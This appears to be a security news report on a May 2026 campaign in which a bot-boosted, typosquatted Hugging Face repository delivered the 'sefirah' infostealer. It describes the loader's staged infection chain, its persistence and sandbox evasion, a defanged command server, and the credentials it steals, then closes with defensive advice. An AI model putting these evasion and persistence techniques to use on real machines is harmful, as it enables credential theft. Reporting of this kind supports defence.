Trending Hugging Face Repo Deploys Sefirah Infostealer

Between May 7 and May 9, 2026, attackers successfully manipulated Hugging Face rankings to distribute malware via a typosquatted repository named Open-OSS/privacy-filter. The package was designed to mimic a legitimate OpenAI tool used for redacting Personally Identifiable Information. By artificially inflating interaction metrics, the repository reached the number one spot on the platform’s trending list, accumulating approximately 244,000 downloads before its removal following reports from HiddenLayer and community members.

Infection Chain and Evasion Strategy

The repository mirrored the authentic OpenAI model card verbatim but shipped with a weaponized script named loader.py. This script contained decoy code to bypass cursory inspections while initiating the infection sequence in the background.

Stage	Component	Function
1	loader.py	Disables SSL verification and decodes a base64-encoded URL.
2	JSON Payload	Executes hidden PowerShell commands.
3	start.bat	Initiates privilege escalation on the host machine.
4	Persistence	Adds exclusion to Microsoft Defender, creates Windows Task Scheduler entry.
5	Payload	Deploys Rust-based sefirah infostealer.

The script executes before any legitimate model loading occurs. By disabling SSL verification, it ensures the outbound connection to the payload server bypasses strict certificate checks that might otherwise flag the initial network request. The final payload, identified as sefirah, is linked to the WinOS 4.0 implant. The malware implements environment checks to detect virtual machines, sandboxes, and debuggers, allowing it to halt execution during automated security analysis.

Exfiltration Targets

Once established, the infostealer harvests sensitive credentials and session data, transmitting them to a command-and-control server at recargapopular[.]com. The payload explicitly targets developer environments and operational infrastructure.

The malware extracts cookies, saved passwords, encryption keys, and session tokens from Chromium and Gecko-based browsers. It searches local file systems for cryptocurrency wallet extensions, seed phrases, FileZilla credentials, and SSH, FTP, and VPN configuration files. It also parses local databases to extract Discord tokens and master keys. The comprehensive credential harvesting indicates the attackers seek to pivot into corporate networks. Development machines often hold high-privilege access tokens, making them prime targets for initial access brokers.

Supply Chain Vulnerabilities

The incident highlights systemic risks in open-source AI model distribution. To achieve the top trending position, attackers deployed a bot network that generated 667 fake “likes” and synthetic interactions. While the download count includes bot activity designed to trick the platform’s ranking algorithm, the repository’s prominent placement exposed genuine developers to the payload.

Security researchers note this campaign shares infrastructure with recent npm ecosystem compromises and aligns with a broader pattern of AI supply chain poisoning. On May 8, a separate incident exposed 341 malicious AI skills on ClawHub, demonstrating how attackers are actively shifting their focus toward machine learning developers. If you regularly pull unvetted weights or execution scripts, the risk profile now mirrors a traditional supply chain attack.

If you download models or utility scripts from community hubs, you must assume compromise and isolate the execution environment completely. Run all third-party code in strict sandboxes without access to your host machine’s SSH keys, environment variables, or local network configurations.